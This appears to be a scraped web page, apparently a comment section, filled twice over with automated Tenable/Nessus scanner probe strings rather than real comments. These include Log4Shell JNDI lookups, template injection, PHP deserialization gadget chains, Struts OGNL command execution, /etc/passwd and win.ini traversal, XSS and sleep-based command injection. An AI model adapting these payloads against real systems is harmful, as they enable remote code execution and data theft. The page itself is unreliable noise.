res.send(`WAS${66528*73149}`)
nessus_was_textc5482mss
nessus_was_text7l2sl5tj
nessus_was_textcrv0gkt3
nessus_was_textz2il0hgr
nessus_was_text51sfb44c
Resolv.getaddress(‘jyxq6z4tgrfms3vyr5k2brjgre5bthhfcxuxzhbxqyeadqt2sfka’+’.was.nessus.org’)
nessus_was_textl596jpa7
nessus_was_text6cvwdfax
was-tnb-ixo
nessus_was_text8c2tfyu1
${jndi:ldap://localhost#was-log4shell-${date:yyyy}qDBs8UnjIMrq39oAiJtU.w.nessus.org}
nessus_was_textthzmbywj
nessus_was_text4gnxtv94
nessus_was_textfz3axb42
nessus_was_texts31aajme
type C:Windowswin.ini
nessus_was_textqpjiuxcp
nessus_was_texthe6dcpxb
nessus_was_textr3jbe6gb
nessus_was_textcnan5p6c
nessus_was_textnhqj5cbo
nessus_was_texti8acghr5
nessus_was_textr5jw2p39
nessus_was_texta2mvowet
nessus_was_textylsud4as
nessus_was_texttd02w8vn
nessus_was_textjhtghla0
nessus_was_textwn7yhdps
nessus_was_textvmzsk0e7
nessus_was_textgcaiu8h5
netdoc:////etc/passwd
nessus_was_texta1mu3p1m
nessus_was_textgj6z9wi5
nessus_was_textcbztr762
@(“tnbwas_XfcsJP1h2L6q”+7461*4523)
${“tnbwas_XfcsJP1h2L6q”+(7461*4523)?c}
nessus_was_textpbgqpa37
nessus_was_textrigbdold
}]][[${“tnbwas_XfcsJP1h2L6q”+7461*4523}]]
nessus_was_texth6ybaa61
nessus_was_textv8wjtn80
nessus_was_textfw9pctkv
nessus_was_textk8gyq6kz
nessus_was_textsoi28j0o
nessus_was_text46ffznyb
nessus_was_textkso18b8e
nessus_was_textn1g1fmgi
a:2:{i:7O:37:”MonologHandlerFingersCrossedHandler”:3:{s:16:”*passthruLevel”i:0s:9:”*buffer”a:1:{s:4:”test”a:2:{i:0s:11:”tenable.was”s:5:”level”N}}s:10:”*handler”O:29:”MonologHandlerBufferHandler”:7:{s:10:”*handler”Ns:13:”*bufferSize”i:-1s:9:”*buffer”Ns:8:”*level”Ns:14:”*initialized”b:1s:14:”*bufferLimit”i:-1s:13:”*processors”a:2:{i:0s:7:”current”i:1s:13:”gethostbyname”}}}i:7i:7}
nessus_was_textu88mh9kp
nessus_was_textjbvm3gjv
nessus_was_textcca2anf0
nessus_was_text3kt7z703
nessus_was_textv859d611
nessus_was_textu8v195gb
a:2:{i:7O:47:”SymfonyComponentCacheAdapterTagAwareAdapter”:2:{s:57:”SymfonyComponentCacheAdapterTagAwareAdapterdeferred”a:1:{i:0O:33:”SymfonyComponentCacheCacheItem”:2:{s:11:”*poolHash”i:1s:12:”*innerItem”s:11:”tenable.was”}}s:53:”SymfonyComponentCacheAdapterTagAwareAdapterpool”O:44:”SymfonyComponentCacheAdapterProxyAdapter”:2:{s:54:”SymfonyComponentCacheAdapterProxyAdapterpoolHash”i:1s:58:”SymfonyComponentCacheAdapterProxyAdaptersetInnerItem”s:13:”gethostbyname”}}i:7i:7}
nessus_was_textufiwdhab
YToyOntpOjc7TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mzp7czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czo1OiJzbWkxZSI7czo2NzoiaGFkcTN6MnJ2a3F3YWk3aHVjbzN1eWZsdnZiZDZ6M3dpZzd4bTR6NWNtcmNmeGtuM3hrcS53YXMubmVzc3VzLm9yZyI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjU6InNtaTFlIjtzOjY6InN5c3RlbSI7fXM6OToiACoAYXBwZW5kIjthOjE6e3M6NToic21pMWUiO3M6MToiMSI7fX19fWk6NztpOjc7fQ==
nessus_was_textv2iy4ldk
a:2:{i:7;O:27:”thinkprocesspipesWindows”:1:{s:34:”thinkprocesspipesWindowsfiles”;a:1:{i:0;O:17:”thinkmodelPivot”:3:{s:17:”thinkModeldata”;a:1:{s:5:”smi1e”;s:11:”tenable.was”;}s:21:”thinkModelwithAttr”;a:1:{s:5:”smi1e”;s:6:”system”;}s:9:”*append”;a:1:{s:5:”smi1e”;s:1:”1″;}}}}i:7;i:7;}
nessus_was_textcpo96nno
nessus_was_text71ttrbm9
a:2:{i:7O:23:”yiidbBatchQueryResult”:1:{s:36:”yiidbBatchQueryResult_dataReader”O:17:”yiidbConnection”:2:{s:3:”pdo”i:1s:3:”dsn”O:26:”yiidbColumnSchemaBuilder”:2:{s:7:”*type”s:1:”x”s:11:”categoryMap”O:22:”yiicachingArrayCache”:2:{s:10:”serializer”a:1:{i:1s:13:”gethostbyname”}s:30:”yiicachingArrayCache_cache”a:1:{s:1:”x”a:2:{i:0s:11:”tenable.was”i:1i:0}}}}}}i:7i:7}
nessus_was_text004gkcvb
a:2:{i:7;O:23:”yiidbBatchQueryResult”:1:{s:36:”yiidbBatchQueryResult_dataReader”;O:17:”yiidbConnection”:2:{s:3:”pdo”;i:1;s:3:”dsn”;O:26:”yiidbColumnSchemaBuilder”:2:{s:7:”*type”;s:1:”x”;s:11:”categoryMap”;O:22:”yiicachingArrayCache”:2:{s:10:”serializer”;a:1:{i:1;s:13:”gethostbyname”;}s:30:”yiicachingArrayCache_cache”;a:1:{s:1:”x”;a:2:{i:0;s:11:”tenable.was”;i:1;i:0;}}}}}}i:7;i:7;}
nessus_was_textfk7tm1tw
nessus_was_textlvc9k62s
YToyOntpOjc7TzoxNToiWmVuZFxMb2dcTG9nZ2VyIjoxOntzOjEwOiIAKgB3cml0ZXJzIjthOjE6e2k6MDtPOjIwOiJaZW5kXExvZ1xXcml0ZXJcTWFpbCI6Mzp7czoxNToiACoAZXZlbnRzVG9NYWlsIjthOjE6e2k6MDtpOjA7fXM6MjE6IgAqAHN1YmplY3RQcmVwZW5kVGV4dCI7czowOiIiO3M6MjQ6IgAqAG51bUVudHJpZXNQZXJQcmlvcml0eSI7YToxOntpOjA7TzoxNDoiWmVuZFxUYWdcQ2xvdWQiOjI6e3M6NzoiACoAdGFncyI7YToxOntpOjA7czowOiIiO31zOjE1OiIAKgB0YWdEZWNvcmF0b3IiO086MzQ6IlplbmRcVGFnXENsb3VkXERlY29yYXRvclxIdG1sQ2xvdWQiOjM6e3M6MTI6IgAqAHNlcGFyYXRvciI7czowOiIiO3M6MTA6IgAqAGVzY2FwZXIiO086MjA6IlplbmRcRXNjYXBlclxFc2NhcGVyIjoxOntzOjE4OiIAKgBodG1sQXR0ck1hdGNoZXIiO2E6Mjp7aTowO086MjM6IlplbmRcRmlsdGVyXEZpbHRlckNoYWluIjoxOntzOjEwOiIAKgBmaWx0ZXJzIjtPOjEzOiJTcGxGaXhlZEFycmF5IjoyOntpOjA7YToyOntpOjA7TzoxNDoiWmVuZFxKc29uXEV4cHIiOjE6e3M6MTM6IgAqAGV4cHJlc3Npb24iO3M6Njc6InVmYjN2ZXZwZng3bjZjZTRicXhnYzNlaWtydHl0Z3gyeXZwNnluNm13a3dnM3U3bHI2MmEud2FzLm5lc3N1cy5vcmciO31pOjE7czoxMDoiX190b1N0cmluZyI7fWk6MTtzOjEzOiJnZXRob3N0YnluYW1lIjt9fWk6MTtzOjY6ImZpbHRlciI7fX1zOjExOiIAKgBodG1sVGFncyI7YToxOntzOjE6ImgiO2E6MTp7czoxOiJhIjtzOjE6IiEiO319fX19fX19aTo3O2k6Nzt9
nessus_was_textzycs5nl7
nessus_was_textr9lv870q
nessus_was_textoccpuojf
nessus_was_textcm36egkd
nessus_was_textpsqjqx9s
nessus_was_textplulapme
https://www.grupoalen.com.d096d72e-6bcb-44e6-8848-ca0ffcaa172f.com
nessus_was_texttixeh0zo
nessus_was_text1e6kxjcc
nessus_was_text6e392u1a
nessus_was_textaykktxqv
<![CDATA[]]>
nessus_was_textyyk4ytfg
nessus_was_text91f69ax8
nessus_was_textkg9pxdki
nessus_was_textru45mirb'”
nessus_was_textxey5ewfc
nessus_was_text70mr8y0e
nessus_was_textw7itpc73
nessus_was_text3f54m97w
nessus_was_textx57l6v0e script:;tenable_wasscan_xss_in_element_event=d096d72e-6bcb-44e6-8848-ca0ffcaa172f//
nessus_was_textlt56xeen
nessus_was_textxltum7s0
nessus_was_textydvis969
nessus_was_text0jgvp2ca
nessus_was_texthaljkb4t${dns:address|63tfimpde5sbjns447cr4z5ecawvddh4qex2k3q5vgnu3u5ld4iq.was.nessus.org}
nessus_was_textdz91vfcs
nessus_was_textip0sxo3t
nessus_was_text9m8i34gb
nessus_was_text1c5b72qd
%{(#request.map=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) + (#request.map.setBean(#request.get(‘struts.valueStack’)) == true).toString().substring(0,0) + (#request.map2=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) +(#request.map2.setBean(#request.get(‘map’).get(‘context’)) == true).toString().substring(0,0) + (#request.map3=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) + (#request.map3.setBean(#request.get(‘map2’).get(‘memberAccess’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedPackageNames’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedClasses’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) +(#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘freemarker.template.utility.Execute’).exec({‘bash -c {echo,WAS-$((868*915))}’}))}
nessus_was_textbzj8jmrj
(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map.setBean(#request.get(‘struts.valueStack’)) == true).toString().substring(0,0) + (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map2.setBean(#request.get(‘map’).get(‘context’)) == true).toString().substring(0,0) + (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map3.setBean(#request.get(‘map2’).get(‘memberAccess’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedPackageNames’,#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedClasses’,#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + (#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘freemarker.template.utility.Execute’).exec({‘getent ahosts 3pdwezbgwirp7eo67erb3onqqa7kmwmgmpsvsj4hrbbywdj2w4bq.was.nessus.org’}))
nessus_was_textv92a8n69
nessus_was_textta51yld6
{{‘tnbwas_HKIv5uIt52sT’+8645*5083}}
nessus_was_textjt9gul26
nessus_was_textqom59g20
nessus_was_text0fjr4jzv
nessus_was_text0jtq05le
” || “a”==”a
nessus_was_textdpmmqbl8
nessus_was_text0b2eoey0
nessus_was_textr8db16cs
nessus_was_textve4y97wb
nessus_was_textee15weov
10002
-1756
-1845
nessus_was_text7iabr2z1
nessus_was_texta13vtv1y
nessus_was_text3h1axij2
nessus_was_texte0iuu1hq
nessus_was_textsgjggl87
nessus_was_texte6vdmt3u
nessus_was_textqfxc6sqq
nessus_was_text4heksjtg
nessus_was_textt5t0lq91
nessus_was_textf8f717zk
nessus_was_textbud26sf9
nessus_was_text2nstsef0
nessus_was_textxpbl6vpi
nessus_was_textqyihj6t4
sleep 4
nessus_was_textm6ow6hr6
|powershell -nop -c “& {sleep (4 – 1)}”
sleep(4);
555
Your email address will not be published. Required fields are marked *
Comment *
Name
Email
Website
137 Comments
res.send(`WAS${66528*73149}`)
nessus_was_textc5482mss
nessus_was_text7l2sl5tj
nessus_was_textcrv0gkt3
nessus_was_textz2il0hgr
nessus_was_text51sfb44c
Resolv.getaddress(‘jyxq6z4tgrfms3vyr5k2brjgre5bthhfcxuxzhbxqyeadqt2sfka’+’.was.nessus.org’)
nessus_was_textl596jpa7
nessus_was_text6cvwdfax
was-tnb-ixo
nessus_was_text8c2tfyu1
${jndi:ldap://localhost#was-log4shell-${date:yyyy}qDBs8UnjIMrq39oAiJtU.w.nessus.org}
nessus_was_textthzmbywj
nessus_was_text4gnxtv94
nessus_was_textfz3axb42
nessus_was_texts31aajme
type C:Windowswin.ini
nessus_was_textqpjiuxcp
nessus_was_texthe6dcpxb
nessus_was_textr3jbe6gb
nessus_was_textcnan5p6c
nessus_was_textnhqj5cbo
nessus_was_texti8acghr5
nessus_was_textr5jw2p39
nessus_was_texta2mvowet
nessus_was_textylsud4as
nessus_was_texttd02w8vn
nessus_was_textjhtghla0
nessus_was_textwn7yhdps
nessus_was_textvmzsk0e7
nessus_was_textgcaiu8h5
netdoc:////etc/passwd
nessus_was_texta1mu3p1m
nessus_was_textgj6z9wi5
nessus_was_textcbztr762
@(“tnbwas_XfcsJP1h2L6q”+7461*4523)
${“tnbwas_XfcsJP1h2L6q”+(7461*4523)?c}
nessus_was_textpbgqpa37
nessus_was_textrigbdold
}]][[${“tnbwas_XfcsJP1h2L6q”+7461*4523}]]
nessus_was_texth6ybaa61
nessus_was_textv8wjtn80
nessus_was_textfw9pctkv
nessus_was_textk8gyq6kz
nessus_was_textsoi28j0o
nessus_was_text46ffznyb
nessus_was_textkso18b8e
nessus_was_textn1g1fmgi
a:2:{i:7O:37:”MonologHandlerFingersCrossedHandler”:3:{s:16:”*passthruLevel”i:0s:9:”*buffer”a:1:{s:4:”test”a:2:{i:0s:11:”tenable.was”s:5:”level”N}}s:10:”*handler”O:29:”MonologHandlerBufferHandler”:7:{s:10:”*handler”Ns:13:”*bufferSize”i:-1s:9:”*buffer”Ns:8:”*level”Ns:14:”*initialized”b:1s:14:”*bufferLimit”i:-1s:13:”*processors”a:2:{i:0s:7:”current”i:1s:13:”gethostbyname”}}}i:7i:7}
nessus_was_textu88mh9kp
nessus_was_textjbvm3gjv
nessus_was_textcca2anf0
nessus_was_text3kt7z703
nessus_was_textv859d611
nessus_was_textu8v195gb
a:2:{i:7O:47:”SymfonyComponentCacheAdapterTagAwareAdapter”:2:{s:57:”SymfonyComponentCacheAdapterTagAwareAdapterdeferred”a:1:{i:0O:33:”SymfonyComponentCacheCacheItem”:2:{s:11:”*poolHash”i:1s:12:”*innerItem”s:11:”tenable.was”}}s:53:”SymfonyComponentCacheAdapterTagAwareAdapterpool”O:44:”SymfonyComponentCacheAdapterProxyAdapter”:2:{s:54:”SymfonyComponentCacheAdapterProxyAdapterpoolHash”i:1s:58:”SymfonyComponentCacheAdapterProxyAdaptersetInnerItem”s:13:”gethostbyname”}}i:7i:7}
nessus_was_textufiwdhab
YToyOntpOjc7TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6Mzp7czoxNzoiAHRoaW5rXE1vZGVsAGRhdGEiO2E6MTp7czo1OiJzbWkxZSI7czo2NzoiaGFkcTN6MnJ2a3F3YWk3aHVjbzN1eWZsdnZiZDZ6M3dpZzd4bTR6NWNtcmNmeGtuM3hrcS53YXMubmVzc3VzLm9yZyI7fXM6MjE6IgB0aGlua1xNb2RlbAB3aXRoQXR0ciI7YToxOntzOjU6InNtaTFlIjtzOjY6InN5c3RlbSI7fXM6OToiACoAYXBwZW5kIjthOjE6e3M6NToic21pMWUiO3M6MToiMSI7fX19fWk6NztpOjc7fQ==
nessus_was_textv2iy4ldk
a:2:{i:7;O:27:”thinkprocesspipesWindows”:1:{s:34:”thinkprocesspipesWindowsfiles”;a:1:{i:0;O:17:”thinkmodelPivot”:3:{s:17:”thinkModeldata”;a:1:{s:5:”smi1e”;s:11:”tenable.was”;}s:21:”thinkModelwithAttr”;a:1:{s:5:”smi1e”;s:6:”system”;}s:9:”*append”;a:1:{s:5:”smi1e”;s:1:”1″;}}}}i:7;i:7;}
nessus_was_textcpo96nno
nessus_was_text71ttrbm9
a:2:{i:7O:23:”yiidbBatchQueryResult”:1:{s:36:”yiidbBatchQueryResult_dataReader”O:17:”yiidbConnection”:2:{s:3:”pdo”i:1s:3:”dsn”O:26:”yiidbColumnSchemaBuilder”:2:{s:7:”*type”s:1:”x”s:11:”categoryMap”O:22:”yiicachingArrayCache”:2:{s:10:”serializer”a:1:{i:1s:13:”gethostbyname”}s:30:”yiicachingArrayCache_cache”a:1:{s:1:”x”a:2:{i:0s:11:”tenable.was”i:1i:0}}}}}}i:7i:7}
nessus_was_text004gkcvb
a:2:{i:7;O:23:”yiidbBatchQueryResult”:1:{s:36:”yiidbBatchQueryResult_dataReader”;O:17:”yiidbConnection”:2:{s:3:”pdo”;i:1;s:3:”dsn”;O:26:”yiidbColumnSchemaBuilder”:2:{s:7:”*type”;s:1:”x”;s:11:”categoryMap”;O:22:”yiicachingArrayCache”:2:{s:10:”serializer”;a:1:{i:1;s:13:”gethostbyname”;}s:30:”yiicachingArrayCache_cache”;a:1:{s:1:”x”;a:2:{i:0;s:11:”tenable.was”;i:1;i:0;}}}}}}i:7;i:7;}
nessus_was_textfk7tm1tw
nessus_was_textlvc9k62s
YToyOntpOjc7TzoxNToiWmVuZFxMb2dcTG9nZ2VyIjoxOntzOjEwOiIAKgB3cml0ZXJzIjthOjE6e2k6MDtPOjIwOiJaZW5kXExvZ1xXcml0ZXJcTWFpbCI6Mzp7czoxNToiACoAZXZlbnRzVG9NYWlsIjthOjE6e2k6MDtpOjA7fXM6MjE6IgAqAHN1YmplY3RQcmVwZW5kVGV4dCI7czowOiIiO3M6MjQ6IgAqAG51bUVudHJpZXNQZXJQcmlvcml0eSI7YToxOntpOjA7TzoxNDoiWmVuZFxUYWdcQ2xvdWQiOjI6e3M6NzoiACoAdGFncyI7YToxOntpOjA7czowOiIiO31zOjE1OiIAKgB0YWdEZWNvcmF0b3IiO086MzQ6IlplbmRcVGFnXENsb3VkXERlY29yYXRvclxIdG1sQ2xvdWQiOjM6e3M6MTI6IgAqAHNlcGFyYXRvciI7czowOiIiO3M6MTA6IgAqAGVzY2FwZXIiO086MjA6IlplbmRcRXNjYXBlclxFc2NhcGVyIjoxOntzOjE4OiIAKgBodG1sQXR0ck1hdGNoZXIiO2E6Mjp7aTowO086MjM6IlplbmRcRmlsdGVyXEZpbHRlckNoYWluIjoxOntzOjEwOiIAKgBmaWx0ZXJzIjtPOjEzOiJTcGxGaXhlZEFycmF5IjoyOntpOjA7YToyOntpOjA7TzoxNDoiWmVuZFxKc29uXEV4cHIiOjE6e3M6MTM6IgAqAGV4cHJlc3Npb24iO3M6Njc6InVmYjN2ZXZwZng3bjZjZTRicXhnYzNlaWtydHl0Z3gyeXZwNnluNm13a3dnM3U3bHI2MmEud2FzLm5lc3N1cy5vcmciO31pOjE7czoxMDoiX190b1N0cmluZyI7fWk6MTtzOjEzOiJnZXRob3N0YnluYW1lIjt9fWk6MTtzOjY6ImZpbHRlciI7fX1zOjExOiIAKgBodG1sVGFncyI7YToxOntzOjE6ImgiO2E6MTp7czoxOiJhIjtzOjE6IiEiO319fX19fX19aTo3O2k6Nzt9
nessus_was_textzycs5nl7
nessus_was_textr9lv870q
nessus_was_textoccpuojf
nessus_was_textcm36egkd
nessus_was_textpsqjqx9s
nessus_was_textplulapme
https://www.grupoalen.com.d096d72e-6bcb-44e6-8848-ca0ffcaa172f.com
nessus_was_texttixeh0zo
nessus_was_text1e6kxjcc
nessus_was_text6e392u1a
nessus_was_textaykktxqv
<![CDATA[]]>
nessus_was_textyyk4ytfg
nessus_was_text91f69ax8
nessus_was_textkg9pxdki
nessus_was_textru45mirb'”
nessus_was_textxey5ewfc
nessus_was_text70mr8y0e
nessus_was_textw7itpc73
nessus_was_text3f54m97w
nessus_was_textx57l6v0e script:;tenable_wasscan_xss_in_element_event=d096d72e-6bcb-44e6-8848-ca0ffcaa172f//
nessus_was_textlt56xeen
nessus_was_textxltum7s0
nessus_was_textydvis969
nessus_was_text0jgvp2ca
nessus_was_texthaljkb4t${dns:address|63tfimpde5sbjns447cr4z5ecawvddh4qex2k3q5vgnu3u5ld4iq.was.nessus.org}
nessus_was_textdz91vfcs
nessus_was_textip0sxo3t
nessus_was_text9m8i34gb
nessus_was_text1c5b72qd
%{(#request.map=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) + (#request.map.setBean(#request.get(‘struts.valueStack’)) == true).toString().substring(0,0) + (#request.map2=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) +(#request.map2.setBean(#request.get(‘map’).get(‘context’)) == true).toString().substring(0,0) + (#request.map3=#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘org.apache.commons.collections.BeanMap’)).toString().substring(0,0) + (#request.map3.setBean(#request.get(‘map2’).get(‘memberAccess’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedPackageNames’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedClasses’,#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘java.util.HashSet’)) == true).toString().substring(0,0) +(#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘freemarker.template.utility.Execute’).exec({‘bash -c {echo,WAS-$((868*915))}’}))}
nessus_was_textbzj8jmrj
(#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map.setBean(#request.get(‘struts.valueStack’)) == true).toString().substring(0,0) + (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map2.setBean(#request.get(‘map’).get(‘context’)) == true).toString().substring(0,0) + (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + (#request.map3.setBean(#request.get(‘map2’).get(‘memberAccess’)) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedPackageNames’,#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + (#request.get(‘map3’).put(‘excludedClasses’,#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + (#application.get(‘org.apache.tomcat.InstanceManager’).newInstance(‘freemarker.template.utility.Execute’).exec({‘getent ahosts 3pdwezbgwirp7eo67erb3onqqa7kmwmgmpsvsj4hrbbywdj2w4bq.was.nessus.org’}))
nessus_was_textv92a8n69
nessus_was_textta51yld6
{{‘tnbwas_HKIv5uIt52sT’+8645*5083}}
nessus_was_textjt9gul26
nessus_was_textqom59g20
nessus_was_text0fjr4jzv
nessus_was_text0jtq05le
” || “a”==”a
nessus_was_textdpmmqbl8
nessus_was_text0b2eoey0
nessus_was_textr8db16cs
nessus_was_textve4y97wb
nessus_was_textee15weov
10002
-1756
-1845
nessus_was_text7iabr2z1
nessus_was_texta13vtv1y
nessus_was_text3h1axij2
nessus_was_texte0iuu1hq
nessus_was_textsgjggl87
nessus_was_texte6vdmt3u
nessus_was_textqfxc6sqq
nessus_was_text4heksjtg
nessus_was_textt5t0lq91
nessus_was_textf8f717zk
nessus_was_textbud26sf9
nessus_was_text2nstsef0
nessus_was_textxpbl6vpi
nessus_was_textqyihj6t4
sleep 4
nessus_was_textm6ow6hr6
|powershell -nop -c “& {sleep (4 – 1)}”
sleep(4);
555
555